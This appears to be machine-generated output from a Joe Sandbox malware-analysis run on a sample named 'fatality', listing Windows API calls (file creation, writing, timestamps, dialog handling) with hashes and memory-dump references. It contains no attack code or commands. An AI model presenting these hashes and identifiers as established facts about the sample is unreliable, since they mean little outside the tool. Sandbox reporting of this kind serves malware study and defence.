                                                                    • Instruction ID: a4b56a49b7f1cdc650390fc1b3f6d9c37d2473f62cb7980feb258b74fd4090a1
                                                                    • Opcode Fuzzy Hash: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
                                                                    • Instruction Fuzzy Hash: 22F0827660022D7ADB3096699C0AFEB776C9F46B41F4E8112BB09B21C0D760DA46C5B6

                                                                    APIs
                                                                    • ___scrt_release_startup_lock.LIBCMT ref: 00DFF444
                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00DFF458
                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00DFF47E
                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 00DFF4C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
                                                                    • String ID:
                                                                    • API String ID: 3089971210-0
                                                                    • Opcode ID: 6169013e71a9380d450aec5448d5ce5843a700057700a5c620cc585184c2cee9
                                                                    • Instruction ID: d330ebb97248a62da2dc84ab168752b09d0e39aad2ce51984fc7e676b42fe1eb
                                                                    • Opcode Fuzzy Hash: 6169013e71a9380d450aec5448d5ce5843a700057700a5c620cc585184c2cee9
                                                                    • Instruction Fuzzy Hash: 9531253264835A69CB347F74AC02BBE67A0DF41324F2AC079F7C07B6D2CE6149858674

                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                    • IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                    • TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                    • DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 1266772231-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 00DFAC2F
                                                                    • SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeMalloc
                                                                    • String ID: riched20.dll$3Qo
                                                                    • API String ID: 48681180-4232643773

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: __freea
                                                                    • String ID:
                                                                    • API String ID: 240046367-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
                                                                      • Part of subcall function 00DFA626: 73516BB0.GDIPLUS(00000010), ref: 00DFA62C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: 73516CreateGlobalStream
                                                                    • String ID: PNG
                                                                    • API String ID: 2601201109-364855578

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE1E55
                                                                      • Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF
                                                                    • _wcslen.LIBCMT ref: 00DE1EFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: H_prolog$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2838827086-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E098A3
                                                                    • _free.LIBCMT ref: 00E098CA
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000001,00000001,?,00DEA23A,?,00DEA2E9,00000001,00000001,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA254
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,00DEA23A,?,00DEA2E9,00000001,00000001,?,?,00DEA175,?,00000001,00000000), ref: 00DEA280
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2673547680-0
                                                                    • Opcode ID: f1257385efe40757e661e36a6ee22fccb9f0d8b1d06ea5a35bdaee920eb9416e
                                                                    • Instruction ID: 4bf7e76a3ffdf0ff20bbb0137fdcc8dd8e500b6f5e30e43522a045cff9ba1a50
                                                                    • Opcode Fuzzy Hash: f1257385efe40757e661e36a6ee22fccb9f0d8b1d06ea5a35bdaee920eb9416e
                                                                    • Instruction Fuzzy Hash: 0DE06D715001689ACB10AB69CC05BD97798AB083E1F048361BE44F7190D670AE448AB0
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DFDEEC
                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00DFDF03
                                                                      • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                      • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                      • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                      • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                      • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate_swprintf
                                                                    • String ID:
                                                                    • API String ID: 3251159408-0
                                                                    • Opcode ID: 08646eef9cf3133f18da6a05834a701fcb18c46ad78535ea112eb0f129de9e4e
                                                                    • Instruction ID: feef99924e18fb11679e2efbd24cde1986117ca649fa64df2c571a6f362cb064
                                                                    • Opcode Fuzzy Hash: 08646eef9cf3133f18da6a05834a701fcb18c46ad78535ea112eb0f129de9e4e
                                                                    • Instruction Fuzzy Hash: 38E092B64003882ADF12BB62DC06FAE3B6C9B15785F444852B304EA1B2DA78EA158671
                                                                    APIs
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02BAA
                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E02BB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                    • String ID:
                                                                    • API String ID: 1660781231-0
                                                                    • Opcode ID: 4cac174450c76d34e66739ae74963e12a402df072613be370c32505fa2963c41
                                                                    • Instruction ID: 26a98f023f542f0c60cbc2f294f790abe8de1187717dd41505d2d73a46df0887
                                                                    • Opcode Fuzzy Hash: 4cac174450c76d34e66739ae74963e12a402df072613be370c32505fa2963c41
                                                                    • Instruction Fuzzy Hash: D7D0223425430018EC142EB43C0F59833C9AE81BB8BE0778FF720F58C1EEA280C0B821
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemShowWindow
                                                                    • String ID:
                                                                    • API String ID: 3351165006-0
                                                                    • Opcode ID: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
                                                                    • Instruction ID: dbce32e96efcf7def44fe86daa3350b5c861c9d8f27a254a33022b5e5f9a4d8e
                                                                    • Opcode Fuzzy Hash: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
                                                                    • Instruction Fuzzy Hash: BDC0123A05C240BFCB010BB5DC09C2BBBA8ABE6312F24C908B0A5D0261C238C114DB11
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 4ca44d36d4aa54e7b10a14b5603d7ceb9c0951fa46266a1c0c061eaa3340206e
                                                                    • Instruction ID: bba50b61f3bf4703b80ffe3389d7b932dccfdcb34e76bbf5c7dd167e89d505b9
                                                                    • Opcode Fuzzy Hash: 4ca44d36d4aa54e7b10a14b5603d7ceb9c0951fa46266a1c0c061eaa3340206e
                                                                    • Instruction Fuzzy Hash: E0C1A338B002949FEF15EF6AC884BAD7BA5EF16310F1841B9EC45DB296DB309944CB71
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 0bd758690314707bd7e46a7b8268dc12c445505a6892ee28af53881a1cb7c1ec
                                                                    • Instruction ID: fedeba27c581d1e2c6305fc8f0aaba5e0e6254a4a74e5dd21d69d569cec9731b
                                                                    • Opcode Fuzzy Hash: 0bd758690314707bd7e46a7b8268dc12c445505a6892ee28af53881a1cb7c1ec
                                                                    • Instruction Fuzzy Hash: DF71C171500B849ECB25EB71C8559F7B7E9EF14301F44496EF2AB87241DA32AA84CF31
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00DE9A50,?,?,00000000,?,?,00DE8CBC,?), ref: 00DE9BAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 025c9a61c2484eb0af231694b7a107f3b289b8cfd1d0fd35e1294cdb1b698b68
                                                                    • Instruction ID: 5ebccf4588636935698c8451942ba463a5c3ad9f9502bddb316e74bb9c198455
                                                                    • Opcode Fuzzy Hash: 025c9a61c2484eb0af231694b7a107f3b289b8cfd1d0fd35e1294cdb1b698b68
                                                                    • Instruction Fuzzy Hash: 9141B0705063818FDB24EF2AE5E446AF7E6FFD4320F198A2DE89583260D770ED448A71
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE8289
                                                                      • Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1
                                                                      • Part of subcall function 00DEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog$CloseFind
                                                                    • String ID:
                                                                    • API String ID: 2506663941-0
                                                                    • Opcode ID: 0546bea390d46c8069707a142cc20ec2fc9b01b0392e8f8eccfab0331fff27ba
                                                                    • Instruction ID: 741cd96568f3422243b9f3296552ff0d36a2377d58c7b24b07051fb5b12bbdd1
                                                                    • Opcode Fuzzy Hash: 0546bea390d46c8069707a142cc20ec2fc9b01b0392e8f8eccfab0331fff27ba
                                                                    • Instruction Fuzzy Hash: 4941B8719446989ADB20FBA1CC55AE9B7B8EF00304F4444EAE18EA7093EB715FC5DB70
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 00DE995F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,00DED343,00000001,?,?,?), ref: 00DEA011
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE13E1
                                                                      • Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C
                                                                      • Part of subcall function 00DECE40: __EH_prolog.LIBCMT ref: 00DECE45
                                                                      • Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    APIs
                                                                    • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 05256708
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcessUser
                                                                    • String ID:
                                                                    • API String ID: 3902816426-0
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DFB098
                                                                      • Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    APIs
                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime
                                                                    • String ID:
                                                                    • API String ID: 1425588814-0
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00DE9F27,?,?,00DE771A), ref: 00DE96E6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
